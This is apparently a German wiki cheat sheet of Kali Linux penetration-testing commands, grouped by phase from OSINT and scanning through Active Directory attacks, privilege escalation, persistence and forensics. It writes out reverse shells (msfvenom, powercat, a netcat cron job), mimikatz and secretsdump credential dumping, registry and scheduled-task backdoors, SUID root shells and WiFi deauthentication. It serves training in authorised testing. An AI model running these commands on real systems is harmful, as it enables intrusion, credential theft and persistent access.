Kali 100 Tools

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Kali-Linux-Werkzeuge - Kurzreferenz (Teil 4)

Nachschlagewerk zu haeufig genutzten Werkzeugen aus dem Bereich Penetration Testing. Alle Beispiele sind ausschliesslich fuer autorisierte Test- und Laborumgebungen (Uebungsnetz) gedacht.

Reconnaissance und OSINT

Sammelt E-Mail-Adressen, Subdomains und Hostnamen aus oeffentlichen Quellen
  • theHarvester -d target.com -b all
Modulares OSINT-Framework mit Metasploit-aehnlicher Konsole
  • recon-ng
Umfassende Subdomain-Enumeration
  • amass enum -d domain.com
DNS-Enumeration mit Records, Subdomains und Zonentransfer-Versuch
  • dnsenum target.com
Grafische Oberflaeche zur OSINT-Analyse und Verknuepfung von Datenpunkten
  • maltego
Informationsbeschaffung zu einer Telefonnummer
  • phoneinfoga scan -n +491234567
Prueft die Existenz eines Benutzernamens auf vielen Plattformen
  • socialscan username
Prueft, auf welchen Diensten eine E-Mail-Adresse registriert ist
  • holehe -e user@example.com
Durchsucht GitHub nach versehentlich veroeffentlichten Daten
  • github-dorks -d <dork>
Scrapt Daten von X (Twitter)
  • twint -u <username>

Netzwerk-Enumeration

Findet aktive Hosts per ARP im lokalen Netz
  • netdiscover -r 192.168.1.0/24
Zeigt die lokale ARP-Tabelle mit bekannten Nachbarn
  • arp -a
Sendet ARP-Anfragen an einen Host
  • arping -c 5 <IP>
Sehr schneller Portscan grosser Portbereiche
  • masscan -p1-65535 --rate 10000 <IP>
Schneller Scan aller 65535 TCP-Ports
  • nmap -p- --min-rate=1000 -T4 <IP>
Detailscan mit Standardskripten und Versionserkennung
  • nmap -sC -sV -p 80,443 <IP>
Einfacher Portscan mit Netcat
  • nc -w 5 -zv <IP> 22-1000
Prueft auf DNS-Zonentransfer
  • dnsrecon -d target.com -t axfr

Web Exploitation

Erkennt die auf einer Website eingesetzten Technologien
Scannt Webserver auf bekannte Schwachstellen und Fehlkonfigurationen
Fuzzing versteckter Verzeichnisse und Dateien
Automatisierte SQL-Injection, listet Datenbanken auf
Erkennt XSS-Schwachstellen

Wireless und Bluetooth

Sucht erreichbare Bluetooth-Geraete
  • hcitool scan
Ping an ein Bluetooth-Geraet
  • l2ping -c 5 <device_MAC>
Scannt nach Bluetooth-Geraeten in der Umgebung
  • btscanner
Aktiviert das Bluetooth-Interface
  • hciconfig hci0 up
Setzt die WLAN-Sendeleistung (regulatorisch begrenzt)
  • iwconfig wlan0 txpower 30
Zeichnet WPA-Handshakes bzw. PMKID auf
  • hcxdumptool -o capture.pcapng -i wlan0mon
Bruteforce eines aufgezeichneten WPA-Handshakes
  • aircrack-ng -b <BSSID> -w wordlist.txt handshake.cap
Framework fuer MITM-Angriffe im WLAN
  • bettercap -iface wlan0
Sendet Deauthentifizierungs-Pakete an ein Netz
  • aireplay-ng -0 10 -a <BSSID> wlan0mon
Deauthentifiziert alle Clients (Denial of Service)
  • mdk4 wlan0mon d

Windows, SMB und Active Directory

Verbindet sich als Gast mit einer SMB-Freigabe
  • smbclient -U "guest" //<target_IP>/share
Listet erreichbare SMB-Freigaben und Rechte
  • smbmap -H <target_IP>
Enumeriert SMB-Freigaben, Benutzer und Gruppen
  • enum4linux -a <target_IP>
SMB-Enumeration und Test von Zugangsdaten
  • crackmapexec smb <IP> -u user -p password
Verbindet sich mit dem RPC-Dienst fuer Benutzer- und Gruppenabfragen
  • rpcclient -U "Administrator" <target_IP>
Listet Domaenenbenutzer
  • net user /domain
Findet die Domaenencontroller
  • nltest /dclist:domain.com
Sammelt AD-Enumerationsdaten fuer BloodHound
  • bloodhound-python -c All -d domain.com -u user -p pass
Extrahiert Windows-Passworthashes (Impacket)
  • secretsdump.py <user>@<target_IP>
Fuehrt Befehle remote per WMI aus (Impacket)
  • wmiexec.py <domain>/<user>:<password>@<target>
Liest Windows-Anmeldedaten aus dem Speicher
  • mimikatz "privilege::debug" "sekurlsa::logonpasswords"
Fordert SPN-Tickets zum Offline-Cracken an (Kerberoasting)
  • kerberoast -u <user> -p <password> -d <domain>

Cloud-Pentesting

Richtet die AWS-CLI mit Zugangsdaten und Region ein
  • aws configure
Zeigt die aktuelle AWS-Identitaet
  • aws sts get-caller-identity
Listet die IAM-Benutzer
  • aws iam list-users
Listet erreichbare S3-Buckets
  • aws s3 ls
Listet gespeicherte Secrets
  • aws secretsmanager list-secrets
Sucht oeffentliche Cloud-Ressourcen ueber AWS, Azure und GCP
  • cloud_enum -k <keyword>
Prueft die Berechtigungen eines S3-Buckets
  • s3scanner -b <bucket_name>
Sucht in Repositories nach versehentlich veroeffentlichten Secrets
Zeigt aktive Google-Cloud-Anmeldungen
  • gcloud auth list
Meldet an der Azure-CLI an
  • az login

Privilege Escalation (Linux)

Zeigt, welche Befehle der Benutzer per sudo ausfuehren darf
  • sudo -l
Findet SUID-Binaries
  • find / -perm -4000 -type f 2>/dev/null
Findet Dateien mit gesetzten Capabilities
  • getcap -r / 2>/dev/null
Zeigt die Capabilities des aktuellen Prozesses
  • capsh --print
Prueft die secure_path-Konfiguration von sudo
  • strings /usr/bin/sudo | grep secure_path
Zeigt als root laufende Prozesse
  • ps aux | grep root
Zeigt die Kernel-Version als Ausgangspunkt fuer die Suche nach bekannten Luecken
  • uname -a
Identifiziert die Distribution
  • cat /etc/issue
Nutzt fehlkonfigurierte Python-Capabilities zur Rechteausweitung
  • python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Fuehrt ein Skript mit root-Rechten aus, wenn sudo fuer python freigegeben ist
  • echo 'import os; os.system("/bin/bash")' > /tmp/script.py && sudo python3 /tmp/script.py

Post-Exploitation und Persistenz

Erzeugt eine Windows-Reverse-Shell-Payload
  • msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe > shell.exe
Legt eine geplante Aufgabe als Persistenz an (Windows)
  • schtasks /create /tn "Backdoor" /tr "..." /sc onstart /ru system
Traegt ein Programm in den Autostart der Registry ein
  • reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\path\to\file.exe"
Aendert die Dateiberechtigungen unter Windows
  • icacls C:\Users\Public\file.exe /grant Everyone:F
Fuehrt einen Befehl per WMIC aus
  • wmic process call create "..."
Fuehrt eine HTA-Payload aus
Reverse Shell ueber PowerShell
  • powercat -c <IP> -p 4444 -e cmd
Legt eine SUID-Shell an (setzt root-Rechte voraus)
  • cp /bin/bash /tmp/bash && chmod +s /tmp/bash
Reverse Shell per Cronjob
  • echo '*/5 * * * * nc -e /bin/sh <IP> 4444' | crontab -
Aktiviert Persistenz in Meterpreter
  • persistence -U -i 30 -p 4444 -r

Social Engineering und Phishing

Startet das Social-Engineering Toolkit (SET)
  • setoolkit
Automatisiert Phishing-Kampagnen anhand fertiger Vorlagen
  • zphisher

Forensik und Steganografie

Zeigt und bearbeitet Metadaten von Dateien
  • exiftool image.jpg
Erkennt und extrahiert eingebettete Daten aus Dateien
  • binwalk -e image.png
Extrahiert lesbaren Text aus Binaerdateien
  • strings file.bin
File Carving zur Wiederherstellung geloeschter Dateien
  • foremost -i disk.img -o output/
Stellt geloeschte Dateien von einem Datentraeger wieder her
  • photorec /dev/sdb
Erstellt effizient ein Abbild eines Datentraegers
  • bmaptool copy /dev/sda image.img
Extrahiert Artefakte wie E-Mails und URLs aus einem Abbild
  • bulk_extractor -o output/ disk.img
Analysiert Windows-Speicherabbilder
  • volatility -f memory.img --profile=Win10 pslist
Analysiert Steganografie in PNG- und BMP-Dateien
  • zsteg image.png
Erkennt Steganografie in JPEGs
  • stegdetect -s image.jpg

Sonstige nuetzliche Werkzeuge

Interaktiver Prozess- und Ressourcenmonitor als Alternative zu top
  • htop
Terminal-Multiplexer fuer mehrere Sessions und Fenster
  • tmux
Grafischer Netzwerk-Sniffer und Analyzer
  • wireshark
Leitet den Verkehr eines Programms ueber Proxys bzw. Tor
  • proxychains firefox
Installiert die Impacket-Bibliothek mit Werkzeugen fuer Windows-Protokolle
  • pip install impacket
Aktiviert IP-Forwarding, etwa fuer MITM-Szenarien
  • echo 1 > /proc/sys/net/ipv4/ip_forward
Oeffnet ein Terminal und fuehrt einen Befehl aus
  • gnome-terminal -- bash -c 'befehl; exec bash'
Beendet die aktuelle Shell-Sitzung
  • exit